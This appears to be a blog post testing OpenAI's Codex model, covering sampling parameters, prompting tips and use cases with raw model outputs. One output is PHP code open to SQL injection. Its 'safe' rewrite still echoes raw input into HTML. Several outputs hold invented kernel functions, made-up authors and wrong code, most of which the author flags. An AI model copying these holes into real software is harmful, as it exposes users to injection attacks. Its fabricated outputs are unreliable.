The temperature is a value from 0-1 that controls how likely the model is to choose tokens that aren’t the most likely ones. This is useful when you want the outputs to be more random or creative. While higher temperatures are often good for generating natural language text, they work less well for generating source code. This is because source code is more structured and “obvious” than natural language. Higher temperatures will result in outputs that attempt to perform the task in unexpected ways, but it is usually better to do things the obvious way than to devise some clever alternative. In contrast, with natural language, stating things in uncommon ways is a good thing, since reframing already known things in new ways can help understanding.
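To make that concrete, here’s a toy illustration of what temperature does to a token distribution. This is just the standard temperature-scaled softmax with made-up numbers, not Codex’s actual sampling code:

# Toy illustration: logits are divided by the temperature before the
# softmax, so low temperatures sharpen the distribution (near-greedy)
# and high temperatures flatten it (more surprising tokens).
import math

def token_probs(logits, temperature):
    if temperature == 0:                      # greedy: pick the top token
        best = max(range(len(logits)), key=lambda i: logits[i])
        return [float(i == best) for i in range(len(logits))]
    scaled = [l / temperature for l in logits]
    m = max(scaled)
    exps = [math.exp(s - m) for s in scaled]
    total = sum(exps)
    return [e / total for e in exps]

logits = [4.0, 3.0, 1.0]                      # made-up scores for 3 tokens
print(token_probs(logits, 0.2))               # ~[0.99, 0.007, ~0]
print(token_probs(logits, 1.0))               # much flatter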

Compare the outputs at the minimum temperature of 0, where it provides a short, working snippet:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Lists TSV files starting with "codex_" for file in codex_*.tsv do echo $file done

…and the maximum temperature of 1, where the code is more complex and doesn’t actually work:

Model: davinci-codex
Temperature: 1
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Lists TSV files starting with "codex_" while read filename do if [ "$(echo "$filename" | grep -c "^codex_")" -eq 1 ]; then echo $filename fi done <

This is mentioned in the documentation for Codex as well:

Setting the API temperature to 0, or close to zero (such as 0.1 or 0.2) tends to give better results in most cases. Unlike GPT-3, where a higher temperature can provide useful creative and random results, higher temperatures with Codex may give you really random or erratic responses.

You can also specify a top-P value from 0-1 to achieve similar results to changing the temperature. The API documentation says:

We generally recommend altering this or temperature but not both.

Copilot dynamically chooses the number of times to sample the model (I’m not sure how exactly), and uses a temperature between 0 and 0.8, with higher temperatures used when there are more samples.

Frequency/presence penalty

The frequency and presence penalties can be used to force the model to behave in certain ways by discouraging it from selecting certain tokens. Increasing the presence penalty discourages the model from producing tokens that it has already produced, and the frequency penalty discourages tokens based on how often they have already appeared in the text. This is useful for stopping the model from getting into a repetition trap: Codex will often get stuck in a loop, repeating the same thing over and over. This isn’t unique to Codex: GPT-3 can also get stuck repeating the same thing. For example, here it gets stuck repeating the last two #includes forever:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
// Kernel driver for USB keyboards. // // Copyright (C) 2005-2006 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU LGPLv3 license. #include "util.h" // dprintf #include "irq.h" // irq_raise #include "usb.h" // usb_keyboard_send #include "usb-hid.h" // usb_hid_send #include "usb-kbd.h" // usb_kbd_keycode #include "usb-kbd-kbd.h" // usb_kbd_keycode #include "usb-kbd-mouse.h" // usb_kbd_mouse_keycode #include "usb-kbd-hid.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode #include "usb-kbd-hid-mouse-keycode.h" // usb_kbd_hid_mouse_keycode #include "usb-kbd-hid-keycode.h" // usb_kbd_hid_keycode

Increasing the frequency penalty fixes the issue:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
// Kernel driver for USB keyboards. // // Copyright (C) 2005-2006 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU LGPLv3 license. #include "util.h" // dprintf #include "irq.h" // irq_raise #include "usb.h" // usb_keyboard_send #include "usb-hid.h" // usb_hid_send #include "usb-kbd.h" // usb_kbd_keycode #include "usb-descriptor.h" // usb_desc_keyboard_report #include "usb-config.h" // usb_config_descriptor #include "usb-device.h" // usb_device_send #include "usb-endpoint.h" // usb_endpoint_xmit #include "keyboard.h" // keyboard_keycode #include "keymap.h" // keymap_keycode #include "layout.h" // layout_keycode #include "scancodes.h" // scancode_to_hidcode // USB keyboard descriptor (from USB HID 1.11 spec, section 7.2.1). static const uint8_t usb_kbd_descriptor[] = { 0x05, 0x01, // USAGE_PAGE (Generic Desktop) 0x09, 0x06, // USAGE (Keyboard) 0xa1, 0x01, // COLLECTION (Application) 0x85, 0x01, // REPORT_ID (1) 0x05, 0x07, // USAGE_PAGE (Keyboard) 0x19, 0xe0, // USAGE_MINIMUM (Keyboard LeftControl) 0x29, 0xe7, // USAGE_MAXIMUM (Keyboard Right GUI) 0x15, 0x00, // LOGICAL_MINIMUM (0) 0x25, 0x01, // LOGICAL_MAXIMUM (1) 0x75, 0x01, // REPORT_SIZE (1) 0x95, KEYBOARD_REPORTLEN - 1, // REPORT_COUNT (KEYBOARD_REPORTLEN - 1) 0x81, 0x02, // INPUT (Data,Var,Abs) 0xc0 // END COLLECTION };
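Mechanically, both penalties just subtract a bias from each token’s score before sampling, roughly along these lines. This is a sketch based on how OpenAI’s documentation describes the penalties, not the actual implementation:

# Rough sketch of how the penalties bias a token's logit: the frequency
# penalty grows with how often the token has already appeared, while the
# presence penalty is a flat hit once it has appeared at all.
def penalized_logit(logit, count, frequency_penalty, presence_penalty):
    return (logit
            - count * frequency_penalty
            - (1.0 if count > 0 else 0.0) * presence_penalty)

# A token that has already appeared 5 times is pushed down harder than a
# fresh one, which is what breaks the #include repetition loop above.
print(penalized_logit(2.0, count=5, frequency_penalty=0.2, presence_penalty=0))
print(penalized_logit(2.0, count=0, frequency_penalty=0.2, presence_penalty=0))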

Writing prompts

If Codex isn’t giving the results you desire, you can often improve the result quality by designing a better prompt to push Codex towards the desired output. It might seem odd that you have to prompt Codex to write good code to make it do so, but consider that Codex was trained on a lot of low-quality code. As such, the output of the model reflects the fact that most code you can find on GitHub is not designed with security in mind. This happens most in languages that have a lot of insecure code written in them, like PHP3. Here, Codex generates PHP code that is vulnerable to SQL injection.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
<?php $name = $_GET["name"]; # Insert $name into the people table $query = "INSERT INTO people (name) VALUES ('$name')"; $result = mysqli_query($db, $query); if (!$result) { die("Database query failed."); } ?> <!DOCTYPE html> <html> <head> <title>Insert Successful</title> </head> <body> <p>The new record in the people table is:</p> <p>Name: <?php echo $name; ?></p> <p><a href="index.php">Back to the home page</a></p> </body> </html>

With a bit of prompt engineering, we can fix the issue by asking Codex to do the insert “safely”4:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
<?php $name = $_GET["name"]; # Insert $name into the people table safely $sql = "INSERT INTO people (name) VALUES (:name)"; $stmt = $db->prepare($sql); $stmt->bindParam(':name', $name); $stmt->execute(); ?> <!DOCTYPE html> <html> <head> <title>Inserting Data</title> </head> <body> <h1>Inserting Data</h1> <p>The name <?php echo $name; ?> has been inserted into the people table.</p> <p>Click <a href="select.php">here</a> to view the data in the table.</p> </body> </html>

Specifying the language

If all you give to Codex is a single comment, it is unable to guess what language to write the code in. You can usually just specify the language: instead of “Do the task”, say “Do the task in Rust”. If your language frequently has shebangs at the top of the file (like #!/bin/bash or #!/usr/bin/env python3) those also work well for specifying the language.

Long-winded comments

Often Codex will write long-winded comments about what it is doing. While these are sometimes desirable, made-up information about the author and license is typically not desired.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
#!/bin/bash # Script to find the total number words in Markdown files in the directory. # # Usage: # ./count_words.sh [directory] # # If no directory is specified, the current directory is used. # # Author: Marko Mahnič # Created: 2010-11-09 (as count_words.sh) # Updated: 2010-11-09 (as count_words.sh) # License: GPL (http://www.gnu.org/copyleft/gpl.html) if [ $# -gt 0 ]; then DIR=$1; shift; else DIR=`pwd`; fi echo "Counting words in files in $DIR" find $DIR -name "*.md" -exec wc -w {} \; | awk '{sum += $1} END {print sum}'

You can get around this by adding empty lines after your comments, so that Codex can’t keep extending the header comment.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
#!/bin/bash # Script to find the total number words in Markdown files in the directory. # Get the total number of words in all Markdown files in the directory. # # @param {string} $1 The directory to search. # @return {int} The total number of words in all Markdown files in the directory. function get_total_words() { local total_words=0 for file in $(find $1 -name "*.md"); do local words=$(wc -w < $file) total_words=$((total_words + words)) done echo $total_words } # Get the total number of words in all Markdown files in the directory. # # @param {string} $1 The directory to search. # @return {int} The total number of words in all Markdown files in the directory. function get_total_chars() { local total_chars=0 for file in $(find $1 -name "*.md"); do local chars=$(wc -m < $file) total_chars=$((total_chars + chars)) done echo $total_chars }

Codex actually generated a longer, really bizarre script that I cut off here, but at least it doesn’t include a made-up author or license!

Use cases

Writing code

Codex is good at writing code, since that’s its main intended purpose. But how much complexity can Codex handle in the code it writes? Let’s take a look at a few examples.

GitHub Copilot

I don’t have access to GitHub Copilot, but anyone can download and install the extension. It just doesn’t work without being able to authenticate with the backend. Taking a glance at the Copilot source code, it seems that it is doing a lot more than just sending the current line to the Codex model. Copilot actually tries to parse the code into an AST, and uses that information to help generate results. It seems it is using that to decide when to generate results, and when to stop the generation. This prevents issues with Codex auto-completing the current function, and then deciding to write more functions after that. This is probably why Copilot only supports a couple languages, while Codex can handle more: Copilot hasn’t implemented parsing support for any other ones.

Context

Codex only supports up to 4096 tokens (where 1 token is around 4 characters of English) of combined context and output. As such, it doesn’t work as well with large codebases, since it can’t see everything that is available in the codebase.
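The “1 token is around 4 characters” rule of thumb gives a crude way to guess whether a prompt plus its expected output will fit in that window. This is only a heuristic; an actual tokenizer is needed for exact counts:

# Crude context-window check using the rough 4-characters-per-token rule.
def roughly_fits(prompt: str, expected_output_tokens: int, limit: int = 4096) -> bool:
    estimated_prompt_tokens = len(prompt) // 4
    return estimated_prompt_tokens + expected_output_tokens <= limit

print(roughly_fits("# a short prompt\n", expected_output_tokens=256))  # True
print(roughly_fits("x" * 20_000, expected_output_tokens=256))          # False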

This is actually somewhat mitigated for code that Codex was trained on (and especially for code that is popular enough that Codex has seen it multiple times), since in those cases Codex knows what the codebase looks like. When Codex is prompted to write code for the Linux kernel, or kernel modules, it can write code that looks like other code in the kernel, and seems like actual kernel source code:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.25
Presence penalty: 0.1
(eventually gets into loop)
// Linux kernel memory management utilites // // Copyright (C) 2012 Kevin O'Connor <[email removed]> // // This file may be distributed under the terms of the GNU GPLv3 license. #include "util.h" // dprintf #include "mmu.h" // mmu_read_cr0, mmu_write_cr0, mmu_read_cr3, mmu_write_cr3 #include "vmm.h" // vmm_alloc, vmm_free, vmm_get_physaddr, vmm_get_page, vmm_get_page2 #include "paging.h" // paging_init, paging_map, paging_unmap #include "multiboot.h" // multiboot_find, multiboot_getmemmap #include "elf.h" // elf32_load #include "elf64.h" // elf64_load #include "elf32.h" // elf32_load #include "elf64.h" // elf64_load #include "x86emu/x86emu.h" // x86emu // Initialize the MMU and set up the kernel page table. This is called by the // boot code once it has finished loading the kernel image and setting up the // stack and heap. It is also called by the kernel when it is running in a // virtualized environment (such as QEMU). The kernel page table is used to map // physical addresses to virtual addresses for use by the kernel itself (e.g., to // access its data structures). The kernel page table is also used to map virtual // addresses to physical addresses for use by the VMM (virtual memory manager). In // this case, the VMM will be using a different page table that maps virtual pages // to physical pages for use by user processes. The kernel page table is also used // to map virtual addresses to physical addresses for use by the MMU (memory manager) // when translating virtual addresses into physical addresses for use by user processes. void mmu_init(void) { dprintf(1, "\nInitializing MMU...\n"); // Initialize the MMU and set up the kernel page table: // Set up a temporary page directory that maps all pages to themselves: uintptr_t tempdir = vmm_alloc(1);

Note that most of the files it #includes actually have different names in the real kernel source code. But the comment it writes for mmu_init is very impressive: it’s not a direct copy of some other comment in the kernel source code, and is actually better than similar real comments. For comparison, here’s an actual MMU initializer from the kernel source:

/*
 * MMU_init sets up the basic memory mappings for the kernel,
 * including both RAM and possibly some I/O regions,
 * and sets up the page tables and the MMU hardware ready to go.
 */
void __init MMU_init(void)
{

Codex produced what seems to be a better header comment! Codex’s ability also raises some interesting copyright questions: does Codex know enough about the Linux kernel for its output to count as a derivative work? It certainly knows a lot about the structure and style of the kernel.

Codex is quite good at working with the Linux kernel. Here, I instructed Codex to write a driver. The generated code looks a lot like a real kernel driver. It declares the right metadata, uses goto-style error handling, and overall looks like the sort of code you would see in the Linux kernel.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
/* Kernel driver for USB boot keyboard */ #include <linux/kernel.h> #include <linux/errno.h> #include <linux/init.h> #include <linux/slab.h> #include <linux/module.h> #include <linux/kref.h> #include <linux/usb.h> #include <linux/input.h> #include <linux/hid.h> #include <linux/moduleparam.h> #define DRIVER_VERSION "v0.6" #define DRIVER_AUTHOR "Arnaldo Carvalho de Melo <[email removed]>" #define DRIVER_DESC "USB boot keyboard driver" static int debug; module_param(debug, bool, 0644); MODULE_PARM_DESC(debug, "Debug enabled or not"); #define USB_VENDOR_ID_LOGITECH 0x046d #define USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER 0xc52b #define USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER_2 0xc52f struct usb_boot_kbd { struct kref kref; struct usb_device *usbdev; struct input_dev *input; char name[128]; }; static void usb_boot_kbd_delete(struct kref *kref) { struct usb_boot_kbd *boot_kbd = container_of(kref, struct usb_boot_kbd, kref); usb_put_dev(boot_kbd->usbdev); input_unregister_device(boot_kbd->input); kfree(boot_kbd); } static void usb_boot_kbd_disconnect(struct usb_interface *intf) { struct usb_boot_kbd *boot_kbd; struct input_dev *input; boot_kbd = usb_get_intfdata(intf); usb_set_intfdata(intf, NULL); if (!boot_kbd) return; input = boot_kbd->input; boot_kbd->usbdev->bus->needs_remote_wakeup = 0; usb_kill_urb(boot_kbd->usbdev->urb); usb_boot_kbd_delete(&boot_kbd->kref); input_unregister_device(input); } static int usb_boot_kbd_probe(struct usb_interface *intf, const struct usb_device_id *id) { struct usb_device *dev = interface_to_usbdev(intf); struct usb_boot_kbd *boot_kbd; struct input_dev *input_dev; int error; if (dev->descriptor.bDeviceClass != USB_CLASS_HID || dev->descriptor.bDeviceProtocol != 0 || le16_to_cpu(dev->descriptor.idVendor) != USB_VENDOR_ID_LOGITECH || (le16_to_cpu(dev->descriptor.idProduct) != USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER && le16_to_cpu(dev->descriptor.idProduct) != USB_DEVICE_ID_LOGITECH_UNIFYING_RECEIVER_2)) return -ENODEV; boot_kbd = kzalloc(sizeof(struct usb_boot_kbd), GFP_KERNEL); input_dev = input_allocate_device(); if (!boot_kbd || !input_dev) { error = -ENOMEM; goto fail1; } kref_init(&boot_kbd->kref); boot_kbd->usbdev = dev; boot_kbd->input = input_dev; snprintf(boot_kbd->name, sizeof(boot_kbd->name), "Logitech Unifying Receiver %04x:%04x", le16_to_cpu(dev->descriptor.idVendor), le16_to_cpu(dev->descriptor.idProduct)); usb_make_path(dev, boot_kbd->name, sizeof(boot_kbd->name)); strlcat(boot_kbd->name, ":input0", sizeof(boot_kbd->name)); input_dev->name = boot_kbd->name; input_dev->phys = boot_kbd->name; usb_to_input_id(dev, &input_dev->id); input_dev->dev.parent = &intf->dev; input_dev->evbit[0] = BIT_MASK(EV_KEY) | BIT_MASK(EV_LED) | BIT_MASK(EV_REP); input_dev->ledbit[0] = BIT_MASK(LED_NUML) | BIT_MASK(LED_CAPSL) | BIT_MASK(LED_SCROLLL) | BIT_MASK(LED_COMPOSE) | BIT_MASK(LED_KANA); input_dev->keycode = boot_kbd->name; input_dev->keycodesize = sizeof(unsigned char); input_dev->keycodemax = ARRAY_SIZE(boot_kbd->name); usb_fill_int_urb(dev->urb, dev, usb_rcvintpipe(dev, dev->actconfig->desc.bEndpointAddress), dev->urb->transfer_buffer, 8, usb_boot_kbd_irq, boot_kbd, dev->actconfig->desc.bInterval); dev->urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP; error = input_register_device(boot_kbd->input); if (error) goto fail2; usb_set_intfdata(intf, boot_kbd); return 0; fail2: kref_put(&boot_kbd->kref, usb_boot_kbd_delete); fail1: input_free_device(input_dev); kfree(boot_kbd); return error; } static struct usb_driver usb_boot_kbd_driver = { .name = "usb_boot_kbd", 
.probe = usb_boot_kbd_probe, .disconnect = usb_boot_kbd_disconnect, .id_table = usb_boot_kbd_ids, }; static int __init usb_boot_kbd_init(void) { int retval; retval = usb_register(&usb_boot_kbd_driver); if (retval) printk(KERN_ERR "Unable to register USB boot keyboard driver\n"); return retval; } static void __exit usb_boot_kbd_exit(void) { usb_deregister(&usb_boot_kbd_driver); } module_init(usb_boot_kbd_init); module_exit(usb_boot_kbd_exit); MODULE_AUTHOR(DRIVER_AUTHOR); MODULE_DESCRIPTION(DRIVER_DESC); MODULE_LICENSE("GPL"); MODULE_DEVICE_TABLE(usb, usb_boot_kbd_ids);

Single-file scripts

Codex works best for generating single-file scripts. Here is an example I find impressive: I gave Codex a vague prompt, and it filled in the blanks. It’s not quite right, since it doesn’t authenticate the request to the Gmail API, but adding proper authentication could be done quite easily (HTTP Basic Auth is supported).

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/usr/bin/env node // Checks if too many emails are unread var fs = require('fs'); var request = require('request'); var config = require('./config.json'); var options = { url: 'https://mail.google.com/mail/feed/atom', headers: { 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3)↵ AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' } }; request(options, function(error, response, body) { if (!error && response.statusCode == 200) { var feed = new (require('feedparser'))(body); var unread = feed.entries.filter(function(entry) { return entry.title.indexOf('unread') > -1; }).length; if (unread > config.maxUnread) { var message = 'You have ' + unread + ' unread emails!'; var options = { host: 'api.pushover.net', port: 443, path: '/1/messages.json', method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': message.length } }; var req = https.request(options, function(res) { res.on('data', function(d) { console.log(d); }); }); req.on('error', function(e) { console.log(e); }); req.write(querystring.stringify({ token: config.pushoverToken, user: config.pushoverUser, message: message })); req.end(); } } });

Subtle errors

Often Codex will write code that looks right at first glance, but actually has subtle errors. Try to spot the error:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Count the number of files in the current directory, and append the count to↵ ~/count.tsv ls -1 | wc -l > ~/count.tsv

In that snippet, it overwrites the existing contents of ~/count.tsv by using > instead of appending with >>. Changing the prompt even slightly fixes it:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
#!/bin/bash # Count the # of files in the current directory, append that to ~/count.tsv # Count the number of files in the current directory num_files=$(ls -1 | wc -l) # Append the count to ~/count.tsv echo "$num_files" >> ~/count.tsv

Another one: here, Codex generates the nth prime, not the nth Mersenne prime.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
// Finds the nth mersenne prime fn nth_mersenne_prime(n: usize) -> u64 { let mut primes = vec![2]; let mut i = 3; while primes.len() < n { if is_prime(i) { primes.push(i); } i += 2; } primes[n - 1] }
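For contrast, here’s what the prompt was actually asking for – the nth prime of the form 2^p − 1 – as a quick Python sketch of my own (trial division is fine for small n; this is not what Codex produced):

# The nth Mersenne prime: the nth prime of the form 2**p - 1.
# Trial division is fine for the first few (3, 7, 31, 127, 8191, ...).
def is_prime(n: int) -> bool:
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True

def nth_mersenne_prime(n: int) -> int:
    found = 0
    p = 2
    while True:
        candidate = 2 ** p - 1
        if is_prime(candidate):
            found += 1
            if found == n:
                return candidate
        p += 1

print(nth_mersenne_prime(4))  # 127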

Writing commit messages

We can try feeding Codex a diff and asking it for a commit message. Codex often struggles here due to lacking enough context. I picked a commit with a commit message that is fairly clear from the diff, “Deprecate llvm_asm!” Can Codex write a commit message?

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
diff --git a/library/core/src/macros/mod.rs b/library/core/src/macros/mod.rs index 87fdbf2dca392..476f37699ee73 100644 --- a/library/core/src/macros/mod.rs +++ b/library/core/src/macros/mod.rs @@ -1347,6 +1347,10 @@ pub(crate) mod builtin { issue = "70173", reason = "prefer using the new asm! syntax instead" )] + #[rustc_deprecated( + since = "1.56", + reason = "will be removed from the compiler, use asm! instead" + )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { --- Commit message: "rustfmt: fix rustfmt_skip attribute"

The commit message looks like the sort of one you would see in rustc, but it doesn’t make sense here. rustfmt is unchanged by the provided diff. I’ve tried writing a better prompt to get Codex to write better commit messages, but I haven’t found a prompt that can convince Codex to consistently write good commit messages. Adding example messages for other commits can sometimes give better results, but sometimes Codex will just regurgitate one of the commit messages it saw before. Asking for an explanation of the commit, instead of asking for a commit message directly, sometimes gives interesting results.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0.2
Presence penalty: 0
diff --git a/library/core/src/macros/mod.rs b/library/core/src/macros/mod.rs index 87fdbf2dca392..476f37699ee73 100644 --- a/library/core/src/macros/mod.rs +++ b/library/core/src/macros/mod.rs @@ -1347,6 +1347,10 @@ pub(crate) mod builtin { issue = "70173", reason = "prefer using the new asm! syntax instead" )] + #[rustc_deprecated( + since = "1.56", + reason = "will be removed from the compiler, use asm! instead" + )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { --- Here is how I explained the effect of this commit: > The `llvm_asm!` macro was deprecated in 1.56.0 because it was not used > anywhere in the codebase. > > The `asm!` macro is a more general macro that allows for inline assembly > with more features than the `llvm_asm!` macro. > > The `llvm_asm!` macro will be removed in 1.58.0, and the `asm!` macro will > remain as a more general macro for inline assembly. --- The commit message is: ```text [1.56.0] Deprecate llvm_asm! in favor of asm! (#70173) ``` ---

This is quite impressive: it managed to extract a link to a relevant GitHub issue from the context lines, and wrote a good explanation. The commit message it wrote after the explanation was quite good as well.

Writing diffs

Let’s try that in reverse: generating a diff, given a commit message.

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
Date: Thu, 29 Jul 2021 16:51:32 +0200 Subject: [PATCH] Deprecate llvm_asm! --- src/libcore/macros.rs | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/libcore/macros.rs b/src/libcore/macros.rs index fc7a8b5..c9d8d2f 100644 --- a/src/libcore/macros.rs +++ b/src/libcore/macros.rs @@ -13,7 +13,7 @@ pub mod asm; pub mod mem; pub mod ptr; pub mod raw; -pub mod simd; +#[macro_use] pub mod simd; pub mod str; pub mod sync; pub mod time; -- 2.21.0

That is a correctly formatted diff, but for a file that doesn’t exist. I didn’t expect Codex to do well here, since it doesn’t know what the file it needs to modify currently looks like. Let’s see if giving it some context will help. This is making it easy for Codex, since I’ve removed all the other lines in the file. All Codex needs to do is figure out what lines to add:

Model: davinci-codex
Temperature: 0
Top P: 1
Frequency penalty: 0
Presence penalty: 0
library/core/src/macros/mod.rs: /// LLVM-style inline assembly. /// /// Read the [unstable book] for the usage. /// /// [unstable book]: ../unstable-book/library-features/llvm-asm.html #[unstable( feature = "llvm_asm", issue = "70173", reason = "prefer using the new asm! syntax instead" )] #[rustc_builtin_macro] #[macro_export] macro_rules! llvm_asm { ("assembly template" : $("output"(operand),)* : $("input"(operand),)* : $("clobbers",)* : $("options",)*) => { /* compiler built-in */ }; } Date: Thu, 29 Jul 2021 16:51:32 +0200 Subject: [PATCH] Deprecate llvm_asm! --- src/macros/mod.rs | 1 + 1 file changed, 1 insertion(+) diff --git a/src/macros/mod.rs b/src/macros/mod.rs index ee9e8c9..f9d8f8e 100644 --- a/src/macros/mod.rs +++ b/src/macros/mod.rs @@ -1,3 +1,4 @@ +//! This module contains the `llvm_asm!` macro. /// The `llvm_asm!` macro provides a #[unstable(feature = "llvm_asm", issue = "70173")] /// way to use inline assembly. @@ -6,7 +7,6 @@ /// /// ## Example /// -/// ``` -/// #[macro_use] -/// extern crate llvm_asm; -/// /// llvm_asm!("mov $1, $2" /// : "=r"(a), "=r"(b) /// : "r"(c), "r"(d) -- 2.22.1

That doesn’t do it either. Perhaps there is some good way to prompt Codex into writing diffs, but I haven’t found any good way to tell Codex to make a change to some existing code.

Explaining code

Another interesting use-case for Codex is getting it to explain code in natural language. I had to go through many iterations of the prompt in order to get the type of explanations I liked: by changing the prompt, you change the type of results you get. Replacing “software developer” with “second grader” makes the explanations simpler. The “at a high level” part helps discourage the model from just doing a line-by-line explanation. I also find that increasing the temperature is beneficial here, since explanations are less structured than source code.

Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
export function isLeapYear(date: Date) { var year = date.getFullYear(); if ((year & 3) != 0) return false; return ((year % 100) != 0 || (year % 400) == 0); } ''' Here's how I explained that code to a software developer at a high level: I have a function called isLeapYear that takes a date and returns a boolean. The date argument is the year to check. The code checks whether the year is divisible by four (modulo). If it's not, then it's not a leap year. Otherwise, it checks if the year is divisible by 100 (modulo). If it is, then we want to see if it's also divisible by 400. If the year is not divisible by 100, then we don't need to check 400. We can use the modulo operator to divide by things like 2 and get the remainder (2 goes into the year number 50 two times, with 10 leftover). We can also use the modulo operator to divide by things like 4 and see if the remainder is 0. If it's zero, then the year number is evenly divisible by 4. If it's not, then it's not. The modulo operator is useful for seeing if a number is evenly divisible by another number, or for finding the remainder when dividing. I hope this helps!
Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
export function getDOY(date: Date) { var dayCount = [0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334]; var mn = date.getMonth(); var dn = date.getDate(); var dayOfYear = dayCount[mn] + dn; if (mn > 1 && isLeapYear(date)) dayOfYear++; return dayOfYear; } ''' Here's how I explained that code to a software developer: "This is a function that takes a date object and returns the day of the year. The day of the year is the number of days that have passed since January 1st. If the month is after February, then we add one to the day of the year because February 29th is counted twice. The day of the year is the sum of the days in the months before the current month, plus the current day. The day of the year is a number between 1 and 365. If the year is a leap year, then we add one to the day of the year because February 29th is counted twice." I'm not sure if this is the best explanation, but it's the clearest I could find.

Let’s try something harder: a data structure function from the Linux kernel. This explanation is very impressive: the code doesn’t even explicitly mention that it is a red-black tree. The only clues are the rb in the function name and the contents of the function. Despite this, Codex delivers an explanation of red-black trees. Note that the __rb_insert_color function is totally made up by Codex: it doesn’t actually exist in the kernel source code. But Codex explains it anyways!

Model: davinci-codex
Temperature: 0.7
Top P: 1
Frequency penalty: 0
Presence penalty: 0.11
static inline void __rb_rotate_set_parents(struct rb_node *old, struct rb_node *new, struct rb_root *root, int color) { struct rb_node *parent = rb_parent(old); new->__rb_parent_color = old->__rb_parent_color; rb_set_parent_color(old, new, color); __rb_change_child(old, new, parent, root); } ''' Here's how I explained that code to a software developer: The function takes the node that is going to be rotated from its parent, the node that is going to take the place of the old node, the root node, and a boolean value indicating whether or not the new node is red. The first thing it does is find the parent of the old node. It then sets the parent pointer of the new node to the old node's parent. It then sets the new node's color to the old node's color. It finally changes the child pointer of the old node's parent to point to the new node. After this function completes, the old node is no longer a child of its parent, and it has been "rotated" into the new node's position. Now that we know how __rb_rotate_set_parents() works, we can look at __rb_insert_color() which implements both the 2-3 and the 2-3-4 tree insertion algorithms. ``` static __always_inline void __rb_insert_color(struct rb_node *node, struct rb_root *root) { struct rb_node *parent, *gparent; while ((parent = rb_parent(node)) && rb_is_red(parent)) { gparent = rb_parent(parent); if (parent == gparent->rb_left) { { __rb_rotate_set_parents(parent, node, root, RB_BLACK); parent = node; } { __rb_rotate_set_parents(gparent, parent, root, RB_RED); } } else { { __rb_rotate_set_parents(parent, node, root, RB_BLACK); parent = node; } { __rb_rotate_set_parents(gparent, parent, root, RB_RED); } } } rb_set_parent_color(node, NULL, RB_BLACK); } ``` This function is responsible for making the new node that was passed in black and setting the parent of the new node to be NULL. Next it checks to see if the parent of the new node is red. If it is, then we need to rebalance the tree. We start by finding the grandparent of the new node. If the new node is the left child of its parent, then we rotate right around the parent. Specifically, we swap the colors of the parent and the grandparent, change the parent pointer of the new node to the grandparent, and then change the child pointer of the grandparent to point to the new node. If the new node is the right child of its parent, then we rotate left around the parent. Again, we swap the colors of the parent and the grandparent, change the parent pointer of the new node to the grandparent, and then change the child pointer of the grandparent to point to the new node. After this is done, we need to check whether or not the grandparent is red. If it is, then we've created a 4-node. In this case, we need to recolor and rebalance the tree. If the grandparent is black, then we're all done. If you've been following along, then you'll notice that __rb_insert_color() basically implements the same rebalancing procedure every time. This is because the __rb_insert_color() function is called any time a new node is added to the tree, and that includes when the root is added. So, how do we know when the root is added? 
